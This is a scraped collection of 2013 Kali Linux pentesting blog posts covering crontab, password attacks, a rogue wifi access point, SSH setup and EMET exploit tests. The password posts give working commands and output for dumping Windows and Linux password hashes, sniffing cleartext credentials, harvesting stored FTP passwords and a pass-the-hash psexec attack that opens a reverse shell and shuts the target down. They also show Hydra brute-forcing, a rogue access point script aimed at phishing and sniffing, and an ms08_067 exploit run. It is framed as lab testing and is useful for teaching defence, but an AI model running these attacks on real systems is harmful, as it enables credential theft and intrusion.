Kali Linux – GoSecure!

Use Crontab to schedule tasks on Linux

Peru — Fri, 20 Dec 2013 17:26:01 +0000

You can use Crontab to schedule the execution of tasks. The command crontab -l list all the scripts already scheduled on your machine and the option -e runs the editing mode.
The basic format string looks like this:

A B C D E /bin/do_something.sh

Where
A = minutes (0-59)
B = hours (0-23)
C = day (1-31)
D = month (1-12)
E = week day (0-6 where 0 is Sunday)

The following are examples for:
– Execute /bin/do_something.sh at 9:40 PM from monday to wednesday
– Execute the script every 15 minute and every day
– Execute the script every 21st and 44th minute on every hour and every day, but only in December

40 21 * * 1-3 /bin/do_something.sh
*\15 * * * * /bin/do_something.sh
21,44 * * 12 * /bin/do_something.sh

Other interesting options:
@reboot = Run once, at startup
@yearly = Run once a year. Like “0 0 1 1 *”
@annually (same as @yearly)
@monthly = Run once a month. Like “0 0 1 * *”
@weekly = Run once a week. Like “0 0 * * 0”
@daily = Run once a day. Like “0 0 * * *”
@midnight (same as @daily)
@hourly = Run once every hour. Like “0 * * * *”

This execute /bin/do_something.sh once, at startup:

@reboot /bin/do_something.sh

How can you manipulate the output?

By default the output is sending to the user (root) mailbox, but it can be redirected.
This Add a row to the file do_something.log inserting output and errors:

@weekly /bin/do_something.sh >> /var/log/do_something.log 2>&1

Send a mail to me@mydomain.com:

* 1,2,3 * * * /bin/script 2>&1 | mail -s "Cronjob ouput" me@mydomain.com:

Trash all output:

@daily /bin/script > /dev/null 2>&1

The Password Attacks on Kali Linux. [Part 2]

Peru — Wed, 06 Nov 2013 12:55:12 +0000

This is a part of my article “The Password Attacks on Kali Linux” published on PenTest Magazine.
I have the right to do up to 100 downloads of that magazines, so If you are interested on it you can download PenTest Extra 04_2013 for free using the following link. The only thing you need is a free registration.
– PenTest Extra 4_2013

The Password Attacks on Kali Linux [Part 2]

Offline Password attack
The service that use as authentication a keyword needs to store it somewhere and somehow. Think about /etc/shadow or SAM in Windows, but also browsers, routers, switches and any kind of client (ftp, e-mail, smb). The password can be stored in clear text, in databases or hashed in files; every time you copy these files and then you try, even in other environment, to extract the passwords you are doing an offline password attack. With administrative rights is possible, for example, to dump password hash from Windows and Linux system. The same operation can be done mounting the target system disk on the Kali system, also without credentials, or starting the system to attack using a bootable Kali distribution.
Files that contain hashed or plaintext passwords can be found in every place: sometimes the database backup is directly hosted in a web folder, let alone files named password.txt that can be found directly using Google; also htaccess and htpasswd can be dumped sometimes. FTP client, zip files, RDP connection files are a mine of keywords easy to collect too. Sniffing traffic waiting for a pop3/ snmp clear-text request or taking a 4 way handshake from an access point are just other options you have to perform an offline attack.
Remember that keys are often reused throughout the network, so a complex password simply sniffed with Wireshark in a not encrypted packet like pop3 (see Figure 1) can be the same unbreakable and encrypted 15-chars password used for ssh service.

Figure 1

Windows SAM file and Linux shadow
Windows stores the hash of local passwords in a file named SAM “Security Accounts Manager” present in c:\windows\system32\config\. Of course the file isn’t plain text, but it has to be merged to another file (SYSTEM) present in the same folder. The union of these two files leads to a readable one where you can see the passwords hash just like thise in Figure 2.
These two files can be accessed only when the operating system is down or using tolls like PWdump or FGdump. The other choice is to dump the system backup of these; in fact, up to Windows Vista, you can find them in c:\windows\repair\ folder. To merge the SAM and the SYSTEM file you can use bkhive and samdump2; after getting the hash, John the Ripper is used to extract the password.

root@kali:~# bkhive /mnt/ntfs/Windows/System32/ config/SYSTEM /tmp/bootkey
root@kali:~# samdump2 /mnt/ntfs/Windows/System32/ config/SAM /tmp/bootkey > /tmp/win_hash.txt
root@kali:~# john /tmp/win_hash.txt

As said previousely, if you own the target machine, you can take advantage of tools like FGdump too or, if you have established a meterpreter session, of the hashdump command (see Figure 2).

Figure 2

Note that you need to be Admin or System to launch these commands and you have to upload to the target machine some lines of code that sometimes can be blocked by antivirus.
Since it’s one of the “most wanted” tools, let’s see also JtR in action:

root@kali:~# john /tmp/win_hash.txt
Loaded 15 password hashes
NINAANI (nina:1)
(peru)
PASSWOR (Administrator:1)
PASSW0R (user:1)
AAAAAAA (jasmine:1)
N (nina:2)
D (user:2)
D (Administrator:2)
COS (nick:2)
A1 (jasmine:2)
DE (albert:2)
CR3T (joy:2)
CYBERDU (albert:1)

Note that most passwords are immediately decrypted (nina, administrator, user, jasmine, albert, peru) when others only in part.
This is caused by the old windows method to store password called LM. This kind of hashing, putted next to the newer NTLMv2, is present by default up to Vista to guarantee the backward compatibility. LM can be disabled and Microsoft recommended that, but de facto this is a vulnerability that users are carrying on for many years.
The LM hash works as follow:
• the user password is converted in an all upper case string;
• the password is cutted after 14 bytes (max password length);
• the password is splitted in 2 pieces of 7 bytes max;
• this two pieces are encoded using DES.
This is a simple view of what is LM, but your interest is that JtR has the task to crack an hash with no more than 7 chars-upper-case. This is really different from finding a key with 14 chars, upper and lower case. in addition to this DES kind of encrypting is well known and john use this to speed up the work.

Also, Linux stores keys in two files: /etc/passwd and /etc/shadow. In this case it’s not essential the merge of the two files, but it’s better for decrypting. You can use the JtR command unshadow to join the two.
In Kali Linux you will be able to call any tool from anywhere on the system as every application is included in the system path so you can call unshadow and john just like this:

root@kali:~# unshadow /etc/passwd /etc/shadow > psw_file

Then you use john to decrypt:

root@kali:~# john psw_file

Sometimes you can try to use john on /etc/shadow without unshadowing it, but in this case john will not use the GECOS info (complete name, telephone number…) that helps to perform a better crack. Also the use of some features like -shells will be lost if you don’t perform the unshadow.

Some small words about using Google as hash cracker.
Google is a big container of everything. It’s not unusual to take an encrypted string, paste it in the browser and find the key.
One of the easiest hash to find is the MD5 one. The Message Digest algorithm 5 is an old method of hashing; it is already obsolete and insecure, but users and programs still employ it to encode passwords. If you try to paste an MD5 string in Google you’ll likely find it. Before trying everything else paste the hash in the search engine or use some online rainbowtable program.

The cache and the sniffing
Although the cache and the packet analysis are not pure offline password attacks, they deserve to be mentioned. If you finally own a PC in the net you have to test, squeeze it. Extract all what you are able to take.
First start a sniffing session using Wireshark or, if you can’t, use Ettercap to perform a man in the middle and wait for unencrypted password. These are some normalized output of Ettercap. The first is the capture of a webmail account on an insecure http page instead of more secure https:

root@kali:~# ettercap -T | grep password
webmail_username=nina&webmail_password=ThisIsMyPAZZWORd HTTP/1.1 302 Found.

Then some capture of POP3 and FTP packets:

root@kali:~# ettercap -T | grep PASS
PASS $$up3rPasW0rsS3creT.
FTP : 192.168.34.140:21 -> USER: adminftp PASS: $$up3rPasW0rsS3creT
PASS jaK3T0ftP.
FTP : 192.168.34.140:21 -> USER: Jake PASS: jaK3T0ftP
PASS #pa$SW0rd>>ma1L2013!.
POP : 192.168.34.140:110 -> USER: albert PASS: #pa$SW0rd>>ma1L2013!
PASS AAAAaaaa1.
POP : 192.168.34.140:110 -> USER: jasmine PASS: AAAAaaaa1

This is why is always better to use an ssl version of all protocols, also in internal communications.

If you have access to a PC search for client’s programs like FileZilla or browsers and take note of passwords archived using meterpreter or search in Internet where the client stores it:

msf post(filezilla_client_cred) > exploit

[*] Parsing recentservers.xml
[*] Collected the following credentials:
[*] Server: 192.168.34.131:21
[*] Protocol: FTP
[*] Username: nina
[*] Password: ninaanin

[*] Collected the following credentials:
[*] Server: 217.115.1.1:21
[*] Protocol: FTP
[*] Username: joy
[*] Password: $$ecr3t12

[*] Collected the following credentials:
[*] Server: 217.115.1.2:21
[*] Protocol: FTP
[*] Username: admin
[*] Password: FTPCr3dz1209

[*] Post module execution completed

Then use ms-cache option of JtR or program like Windows Credentials Editor that locate system cached password: if you are lucky a sysadmin has been logged or some service is misconfigured and the password is stored (not encoded) in the cache.
In the following case of study the user HP\Nina, present in Domain Administrators group, is simply logged on. In this machine is present an agent misconfigured that use HP\administrator credential to work:

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings\nina>wce.exe -w
WCE v1.3beta (Windows Credentials Editor)
by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

HP-SRV01$\HP:
nina\HP:ninaanin
Administrator\HP:password
C:\Documents and Settings\nina>

Note that cache keys “ninaanin” and “password” are not encoded.

SMB pass-the-hash
Like in the previous example, not always you’ll have to spend time in decrypting operations. Sometimes you can use the hash you get as it is. Ok, you can’t take the string and just paste it in a authentication window request and login using Remote Desktop, but there is a quite controversial feature in Windows on the authentication management of shared folders.

Consider this example:
Computer A has a c:\share and Computer B tries to connect to that share. B sends its credential in hash format (“hello! I am Administrator and my password is e52cac67419a9a224a3b108f3fa6cb6d”) and A verify if it has this credential, if so it connects Computer B to the share. If not it prompts for username and password.
All this process is in clear text!
So, what about If the Computer A is an attacker and has a network sniffer? It collects the Computer B hash! Now attacker on Computer A can try to decode the hash, but not only that. He can use Metasploit, taking advantage of the module pass the hash, and own the B machine.
He uses the Administrator hash to connect to ADMIN$ of B and execute some code like reverse shell. The SMB_relay exploit, present in Metasploit, has everything you need to test this Windows vulnerability: it creates a fake sharing folder, captures the hash, pushes a payload and establishes a connection. Of course the pass the hash function can be also used with hashes previously collected:

root@kali:~# msfcli exploit/windows/smb/psexec RHOST=192.168.34.135 SMBuser=Administrator
SMBPass=E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C E

RHOST => 192.168.34.135
SMBuser => Administrator
SMBPass => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
[*] Started reverse handler on 192.168.34.140:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.34.135:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \QxsHwGjv.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (OihQHhAa - "MZqTViuX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \QxsHwGjv.exe...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.140:4444 -> 192.168.34.135:1534) at 2013-08-01 10:10:44 -0400

meterpreter > sysinfo
Computer : HP-SRV01
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

meterpreter > shell
Process 3816 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>shutdown -s -t 00 -c "ByeBye!"
shutdown -s -t 00 -c "ByeBye!"

Are you still secure to connect to a network shared folder? So, if you have to secure a network, remember the users: force a strong domain policy, patch the systems, use SSL wherever you can, set different passwords for different services and, above all, educate the people.

The Password Attacks on Kali Linux. [Part 1]

Peru — Fri, 27 Sep 2013 15:49:42 +0000

The Password Attacks on Kali Linux [Part 1]

What is the weakest part of the security chain? You know the answer: the one who stand between the keyboard and the desk chair. And what does this user do on her/his first job day? Set a password. Yes, a big part of our security environment lies around that password.

Of course we talk about internal password because Nerwork Administators have well learned the lesson and secure their external accounts with encryption, strong policy, access restriction; in spite of this the internal accounts are the heaven for hackers (and the hell of sysadmins).
Nowadays internal users are, fortunately, low-privileged and some kind of policy forces a little of security, but even if your policy is set with more than 8 characters with numbers, upper and lower case, there will be a user that set as password something like AAAAaaaa1 or Password1.

The complete takeover of a net is a stairway that goes through information gathering, network discovering, password cracking and system owning. Also, finding a low-privilege password is one stair over and it’s actually one of the biggest gap that a penetration tester has to pass. If you find a password, you can quickly test it on other systems and services previously discovered (ssh, ftp, mail): users have the bad routine to use the same keyword for different services.
When you discover a password, you can make an idea about the security company policy and you can try a widespread brute-force attack. If you find, for example, a key of 8 characters, all low case, you can try an attack using this setting on all systems of the LAN. Even if you find a key word from user that isn’t administrator or root there are lot of well-known privilege escalations that can be attempted, especially for old or unpatched system.
Other options that can be used, when you owned a PC with an unprivileged account, are: sniffing traffic,
extracting stored credentials or pivoting other attacks. All these things lead you over and over inthe stairway. In substance, a right association user-password is one of the core success on a pentest and it’s all trusted to an user and his password, that he has chosen on his first job day.

Some terms
Let’s start making a specification. There are two common names you can hear talking about password attack: BruteForce and WordList.
Brute force is when the password is tested using all designated characters, using a set length. The following is an example: use character ‘a’, ‘b’ and set length 2. The password that will be tested are aa, bb, ab and ba; these are 4 tries. You can calculate the amount of attempts: quantity of characters elevated to length used, in this case 2^2=4. Because it is an exponential, it can be become very difficult to test something with ten characters using full ASCII set: according to Password time calculator by lastbit.com this BruteForce attack will take up to 4274902 years.
BruteForce attack, but a WordList one, where what will be used as keys are all single words present in one list.
Note that the password used is exactly the same written in the list. So if in the document there’s the word ‘backup’ only this word will be tested and not ‘Backup’ or ‘back-up’; fortunately there are programs that make these permutations automatically.
So wordlists are often a smarter attempt than a bruteforce attack; in spite of this, during a pen test, you must have a very strong reason to spend hours for this kind of attack.
Of course the following password attacks are done using Kali Linux, because it has every tool you’ll need. Thanks to OffensiveSecurity, Kali Linux, like its father BackTrack, is one of the most used pentesting distributions. If you are reading here you known what we are talking about.

Create your user and password list
To perform a wordlist attack you need, of course, a list of words. There are many techniques to create it, and many places where you can find a precompiled one, but the best way is to create a document based on your needs. From my personal opinion, in this case, is necessary to start from locating valid usernames from the network I‘m testing and using these as a first simple list, trying blank, username as password or very simple passwords.
The harvest, by Edge-Security Research, is a very useful tool that helps you by searching for a company name in various resources database (Google, Linkedin, PGP, Bing…) and then extracts for you probable user names. In the Figure 1 you can see the result of a research: maybe vdiaz, cdelojo and cmartorella are also FTP, SSH or RDP users.
Then you can try to locate some useful accounts from the company website: e-mails and documents such as pdfs, docs or similar can be downloaded to gain such information. You can automate the operation by using another tool by Edge-Security Research: metagoofil (see Figure 2).

Figure 1

Figure 2

Another way to find usernames, when you are in the testing-Company LAN, is to locate a mail server and an SNMP service. Mail server can be vulnerable to VRFY command and you can use it to probe the system for login names. The VRFY is a licit command and fortunately, in modern system, is disabled to patch this security issue, but sometimes you can still use it. Let’s look how it works using a simple Netcat connection:

root@kali:~# nc -nv mailserver.fakesite.lab 25
(UNKNOWN) [10.0.7.14] 25 (smtp) open
220 mailserver.fakesite.lab ESMTP Sendmail 8.13.7
VRFY freddie
550 5.1.1 freddie... User unknown
VRFY root
250 2.1.5 root
VRFY test
550 5.1.1 test... User unknown

If the system is vulnerable, smtp-user-enum program can be used to get some usernames; the following is the basic command to use it:

root@kali:~# smtp-user-enum -M VRFY -U users.txt -t 10.0.7.14

Note that the option -U uses a wordlist in order to find names. If you haven’t one you can find some preloaded in Kali using a command like this:

root@kali:~# find / | grep users.txt

However the suggestion is to keep your list under 100-150 names. Smtp-user-enum can also be used to test the EXPN function; EXPN is similar to VRFY, but it is used on distribution list and it lists all its users. This can be a bigger problem than the VRFY since sites sometimes have an alias such as “all”.
Another way to compile your focused user list is SNMP analysis. SNMP is a protocol based on UTP that is often used to monitor servers’ service status.
The distribution lists (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to query the server and get many information.
You can use a combination of Onesixtyone and Snmpcheck; the first can be used to enumerate community strings, so, after locking on the hosts with SNMP service, the program can be run.

root@kali:~# onesixtyone -c /usr/share/doc/onesixtyone/dict.txt -i /tmp/host-snmp.txt

The dict.txt is a wordlist (another one) of possible community strings and it is already present in Kali; the host-snmp.txt is a file with the IPs of all hosts with the SNMP service active in the network. The word in the square brackets (see Figure 3) is what you are searching for and the next step is to use this word combined to Snmpcheck to extract data from the service.

Figure 3

root@kali:~# snmpcheck -t 192.168.34.135 –c admin | grep -a “User accounts” -A 11
[*] User accounts
-----------------
Administrator
Guest
IUSR_HP-SRV01
IWAM_HP-SRV01
SUPPORT_388945a0
albert
krbtgt
jodie
user
expert

In this example the output is limited to the user accounts (grep -a “User accounts” -A 11), but you can get much more info using SNMP such as processes running, programs installed, open ports, network and routing configurations, storages information and much more.

There are several ways to find a username in the net: if something similar to PC-pedro or Maria’s MacBook is found the assumption is that Pedro and Maria are likely to be usernames that will have access on these computers. It’s important to compile the user list meticulously and add every possible username you find, so you can use it later.

Finally you have a user list that will help you in a first simple password attack.
If you will have no results you’ll wish to make some simple extensions to that list using John the Ripper (JtR) or you’ll try another small wordlist like /usr/share/john/password.lst; also in this case JtR can be used to make some little changes.
Let’s see some usage of John the Ripper password cracker by Openwall. Note that this program does more than what you’ll read here. You will see now, how make some simple mutations in order to upgrade your user list and use it as a password list.
The idea is to create something that leads from an input as ‘root’ to an output like Root, ROOT, rootroot, toor, Root1 and so on. Well, let’s expand a small file (wordlist.lst) with only ‘root’ and ‘password’:

root@kali:~# john -w=wordlist.lst --rules --stdout | tr -s '\n' ' '
words: 100 time: 0:00:00:00 100% w/s: 10000 current: Passwording
root password Root Password roots passwords root1 password1 Root1 Password1 rootroot toor drowssap 1root 1password ROOT PASSWORD root2 password2 root! password! root3 password3 root7 password7 root9 password9 root5 password5 root4 password4 root8 password8 root6 password6 root0 password0 root. password. root? password? psswrd RootRoot tooR drowssaP Toor Drowssap roottoor rooT passworD 2root 2password 4root 4password Root2 Password2 Root! Password! Root3 Password3 Root9 Password9 Root5 Password5 Root7 Password7 Root4 Password4 Root6 Password6 Root8 Password8 Root. Password. Root? Password? Root0 Password0 3root 3password 7root 7password 9root 9password 5root 5password 6root 6password 8root 8password Roots Passwords rooted passworded rooting passwording Rooted Passworded Rooting Passwordin

In this case a default rule set is used (--rules), but you can modify it using /etc/john/john.conf; note that with 2 words JtR generates 100 words instantly.
The output is normalized, in this case, using tr -s '\n' ' ', but you can remove this part of command and redirect all in a file that fits your needs. Later,
talking about offline attacks, you’ll come across JtR again and you’ll find some other awesome features. Even though, I think, using a huge wordlist is not a good idea, it can be useful to know how to make it, so here are two great tools.
The first is CeWL, you can use it to dig a Company web site to extract words and convert these in a list. The basic usage is very simple and the impact awesome:

cewl www.fakesitelab.com > /tmp/wordlist.txt

You can even use it to extract usernames by pointing CeWL to sites that collect popular birth names. Similarly you can use it to create monothematic wordlists: animals, plants, countries, cars, “Lord of the Rings”, topic words and so on.
The concept I’d like to remark is that in an online password attack you are connected to the LAN: you make network traffic, you stress systems and you can’t stay there all night and day long.
The second tool is Crunch. It can be used to create a word list too, but starts from a different point of view compared with CeWL. Crunch is more like a bruteforce: it generates all words using some parameters you set. Essentially you establish min and max length and a charset (or use the default one); so you can create all possible combinations of characters a, b, c with length from 2 to 4 using the following command:

root@kali:~# crunch 2 4 abc

More specific and interesting usage can be read in the manual page, like the -t option: you can take one word and append some characters to it:

@@god@@@@ where the only the @’s, ,’s, %’s, and
^’s will change.
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols

The output can be sent to the screen, to a file, or to another program; this last option allows the use of Chunch directly on an online/offline cracking operation without physically generating a wordlist, saving hard disk space.

Online Password Attack
One of the best tools to complete the online attack is Hydra. This program is tasked to join your lists and to perform the attack over a network service.
The figure 4 explains how it works: it puts together a username list, a password list and a host list split by services to attack (FTP, RDP, SSH, MySQL…).
Then it starts to try every username and password associations on every hosts. Some other parameters can be set such as proxy or the number of tasks; very useful when attacking some cranky service like RDP.

Figure 4

The following is the command that performs a wordlist attack against all FTP hosts in the net:

root@kali:~# hydra -s 21 -V -L /tmp/users.txt -P /tmp/passwords.txt -e nsr -t 16 -M /tmp/FTP_hosts.txt ftp

The -L, -P and -M options are used to point to the wordlists of users, passwords and hosts and can be replaced by -l, -p and a IP to use a single name, password or target. -s is the port to attack and the ftp at the end is the service used as target. -V stands for verbose and -e option tries n null password, s login as pass and/or r reversed login. Finally -t is the number of task that Hydra will use.
The simplest way to learn the use of this tool is to take a look at the GUI xHydra (see Figure 5).

Figure 5

Hydra is the end (maybe happy) of the online password attack, but it is no more than a task executor. Its force lies in the wordlists you will be able to create, don’t forget this.

[end of part 1]

Rougue Access Point using Kali Linux

Peru — Fri, 20 Sep 2013 10:07:44 +0000

A Rougue Access Point (RAP) is a fake wifi connection that can be used to sniff information.
Basically you have a PC (Kali Linux live in this case) with 2 interfaces: a wired one (eth0) connected to a working network and a wireless one (wlan0).
The wireless card will be configured as AccessPoint (AP) and a bridge will be created to link wired and wireless connections.
When a user connects to the new hot spot created, his data are bridged, through the PC, to the wired connection and proxed to the destination (internet).
I use for these operations airbase-ng command (aircrack-ng suite).

Some scenarios:
– Sniffing traffic
I setup a RAP and start wireshark, ettercap or another network sniffer. Every connections that pass through my PC are intercepted.
– Phishing
I setup a RAP and force it to use mine DNS Server. If someone will connects to me and start to surf I am able to redirect traffic using my DNS. In this case I can implement some kind of phishing.
– Company network back door
I setup, may be using a small RaspberryPi, an access point using the Company network as wired interface. This is an hot spot directly connectet to the Company LAN.
– Caffè-Latte attack
Locoking at the wireless packets you can see the client trying to connect to the previusly registred access point (eg. MY_NETWORK). I Can setup an access point using the same SID the client is searching for. When the client, that is serching for a known SSID, find my RAP named MY_NETKORK it immediatly try to connect. I can use this connection to sniff WPA handshakes or WEP packets and try to decode passwords.
– Extend my connection
I have a notebook connected to a LAN but no access point. I also have a smartphone and I want a wireless connection on-the-fly.

The basic configuration:
– eth0, the wired connection linked to the network
– a DHCP server working on the LAN where eth0 is connected
– wlan0, a wireless interface able to be setted up in monitor mode

I start the monitor mode on wlan0:

root@kali:~# airmon-ng start wlan0

This will create the mon0 interface.
Now I setup an AP on mon0, named “MY_network”, channel 11 and WEP autentication. I can also set it as a free wifi without password (airbase-ng --help).

root@kali:~# airbase-ng --essid MY_network -c 11 -w abcdefabcdefabcdefabcdef12 mon0

This will create the at0 interface.
Now the AP is started, in another terminal window I make a bridge named rougue-bridge and link at0 to eth0 using the bridge-utils. Note that in Kali Linux the bridge-utils have to be installed (apt-get install bridge-utils) in order to use brctl command.

root@kali:~# brctl addbr test-bridge
root@kali:~# brctl addif test-bridge eth0
root@kali:~# brctl addif test-bridge at0

I can release the IPs of eth0 and at0. This is because the two interfaces are now integrated in the virtual bridge and don’t need an IP anymore:

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 down
root@kali:~# ifconfig at0 0.0.0.0 up

I need also the IP forwarding:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

At the end I configure the test-bridge. Differently from eth0 and ap0 the bridge needs an IP of the LAN where eth0 is connected.

root@kali:~# ifconfig test-bridge 192.168.x.y netmask 255.255.255.0 broadcast 192.168.x.255 up
root@kali:~# route add default gw 192.168.x.1

Note that these are temporary operations that will be discarded by rebooting the system.

Extra
Starting an AP to sniffing handshake.

root@kali:~# airbase-ng -c 6 -e ESSID -z 2 -W 1 -F file.cap wlan0

-z sets WPA1 tags (2 = TKIP)
-W set WEP flag in beacons. The option -W 1 is recommended when using -z or -Z
-F where to store the cap file.

Here’s my old simple script to start a Rougue Access Point using Linux Bash. It may need some adjustment, but I think it will work.

#!/bin/sh
echo "---------------------------------------"
echo "Script per la creazione di un Rougue AP"
echo "---------------------------------------"
echo "Digita"
echo " Per creare un Rougue AP per la cattura dell'handshake digita ----> 1"
echo " Per creare un Rougue AP per condividere la connessione digita ---> 2"
read CHOSE1
if [ "${CHOSE1}" == "1" ]
then
#Inizio creazione AP per cattura handshake
echo
echo "Creazione AP per cattura handshake"
echo
echo "Quale essid vuoi utilizzare?"
read ESSID1
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN1
echo "IL file con i pacchetti è salvato in /tmp/${ESSID1}.cap"
ifconfig wlan0 down
airmon-ng start wlan0
airbase-ng -c ${CHAN1} -e ${ESSID1} -z 2 -W 1 -F /tmp/${ESSID1}.cap wlan0
#Fine creazione AP per cattura handshake
read
elif [ "${CHOSE1}" == "2" ]
then
#Inizio creazione AP per condivisione connessione
echo
echo "Creazione AP per condivisione connessione"
echo
echo "Faccio partire la funzionalità di monitoring su wlan0"
ifconfig wlan0 down
airmon-ng start wlan0
echo "Creo un AP sull'interfaccia virtuale at0"
echo "Quale essid vuoi utilizzare?"
read ESSID
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN
echo "Impostare una password? (y/n)"
read CHOSE2
if [ "${CHOSE2}" == "y" ]
then
gnome-terminal --geometry 83x19 -x bash -c "
echo "La password è stata impostata di default WEP abcdefabcdefabcdefabcdef12"
airbase-ng --essid ${ESSID} -c ${CHAN} -w abcdefabcdefabcdefabcdef12 mon0"
else
echo "La password non è stata impostata"
gnome-terminal --geometry 83x19 -x bash -c "
airbase-ng --essid ${ESSID} -c ${CHAN} mon0"
fi
echo "Creo l'interfaccia br0 bridge vi ecollego eth0 e at0"
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
ifconfig eth0 down
ifconfig eth0 0.0.0.0 up
ifconfig at0 down
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Inserisci i dati per nuova interfaccia bridge creata"
echo -n "Indirizzo ip:"
read IP
echo -n "Netmask:"
read NETMASK
echo -n "Broadcast:"
read BROAD
echo -n "Gateway:"
read ROUTE
ifconfig br0 ${IP} netmask ${NETMASK} broadcast ${BROAD} up
route add default gw ${ROUTE}
#Fine creazione AP per condivisione connessione
read
else
echo "Scelta non corretta premere invio per uscire dal programma."
read
fi

Setting up a ssh server on Kali linux

Peru — Mon, 15 Jul 2013 22:46:35 +0000

Environment:
The SSH server is a Kali Linux (hostname:kali ip:10.0.0.3)
The SSH client is a Backtrack (hostname:bt ip:10.0.0.2)

Configuration:
On the Kali distribution the ssh server is already installed so I have only to start it; I can do it using the menu Applications > Kali Linux > System Services > SSH > sshd start
After that I can immediatly connect from client using the user autentication

root@bt:~# ssh root@10.0.0.3
root@10.0.0.3's password:
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Ofcourse I want to secure the SSH server, so I stop the service and I will setup SSH to use an RSA authentication.
On server I create the keys using ssh-keygen command; this will create 2 keys:
– Public key, resident on the server, in my case it is called id_rsa.pub
– Privare key, used by the client, called id_rsa

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
eb:63:b6:89:a3:74:dd:76:9f:ea:7f:1e:d4:d4:ba:9b root@kali
The key's randomart image is:
+--[ RSA 2048]----+
| |
| .|
| o|
| o.|
| S ...|
| . o .. |
| . . o o . .. |
| . ..o+o . . +o|
| ...++o .ooEo.|
+-----------------+

As I said, the private key, has to be transferred on the client. I start a Netcat listener on machine called bt

root@bt:~# nc -lp 4444 > id_rsa

On the server, the Kali machine, I connect to the listener and transfer the key

root@kali:~# nc -w 1 10.0.0.2 4444 < /root/.ssh/id_rsa

Note that NC file transfert is not a secure way to pass the key. That is why NC isn’t an encrypted channel. I use this method because I am in a lab/test environment.

On server I have to edit the file /etc/ssh/sshd_config to allow RSA authentication.

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys

Is a good idea to remove user autentication too

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

I save the file and restart the service.
The last server operation is to add the id_rsa.pub key on the file indicated on sshd_config in the field AuthorizedKeysFile

root@kali:~# cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

Note that I have to add the key (>>) to the file, not to overwrite it (>), since I can have more than one publik key stored in the same file.

I move on the client and give the right permission to id_rsa (chmod 600 id_rsa). I am not used to store private keys on the default folder, but I prefer to store it in an encrypted folder and then to use the -i option of the ssh client.

Ok, let’s try the access using my new RSA key

root@bt:~# ssh root@10.0.0.3 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Remember that is good:
– To store your private keys in a protected place
– To create keys with strong password
– To hardening sshd_config (eg. disable root access)
– To take a look at the auth file log (/var/log/auth.log)

EMETv4 – Part 2

Peru — Mon, 24 Jun 2013 14:50:14 +0000

[begin of phase 2] Take a look at the [phase 1]

I continue my tests about EMETv4. This time I’ve installed EMETv4 on the same machine HP-CLI01 and HP-SRV01 (note that framework 4 is required ). The only configuration I set is the “recommended” one.

Test4
Target: Windows Server 2003 SP2 eng; Host Name: HP-SRV01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit
EMET agent: installed with recommended settings.

This is MSFConsolle ouput of the exploit:

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 16002
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

Provided by:
hdm
Brett Moore
staylor
jduck

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
